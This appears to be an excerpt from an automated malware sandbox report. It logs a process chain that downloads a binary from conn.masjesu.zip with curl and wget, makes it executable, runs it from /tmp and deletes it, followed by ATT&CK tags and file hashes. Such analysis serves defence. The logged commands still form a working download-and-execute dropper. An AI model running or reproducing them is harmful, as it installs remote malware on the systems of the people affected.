/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1003
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:1005
-
-
/bin/chmodchmod 777 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG./59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:1008
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97